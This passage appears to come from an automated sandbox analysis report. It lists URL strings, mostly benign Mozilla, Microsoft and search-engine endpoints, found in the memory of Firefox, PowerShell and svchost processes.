Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgbrowser.urlbar.suggest.topsitesremoveTabsProgressListenercreateContentPrin
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: powershell.exe, 00000007.00000002.3030468982.0000000004A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.comrward-
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B749E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3307005394.000001A8B2781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000010.00000003.3238343935.000001A8C3792000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3263073996.000001A8C3846000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.comorward-
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000010.00000003.3257903707.000001A8B8D6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Error
Source: firefox.exe, 00000010.00000003.3214705586.000001A8C0269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000010.00000003.3225852250.000001A8B8034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000010.00000003.3212468668.000001A8C02E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7B2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3330787150.000001A8B6F9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000010.00000003.3264232330.000001A8C333F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6164000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsFea
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000010.00000003.3125375221.000001A8B7F39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000010.00000002.3343255794.000001A8B7E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3049091889.000001A8B6D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3124581300.000001A8B80E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262099436.000001A8B89AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3186917673.000001A8B80D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sget
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3241215258.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3266404421.000001A8BE3B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000003.3115376435.000001A8C35FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3116798829.000001A8B716B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000010.00000002.3319593881.000001A8B4F50000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1AIzaSyB2h2OuRcUgy5N-5hsZqiPW6sH3n_rptiQ
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1AIzaSyB2h2OuRcUgy5N-5hsZqiPW6sH3n_rptiQParent
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: svchost.exe, 0000000C.00000003.2982483521.00000297488B3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000C.00000003.2982483521.0000029748840000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
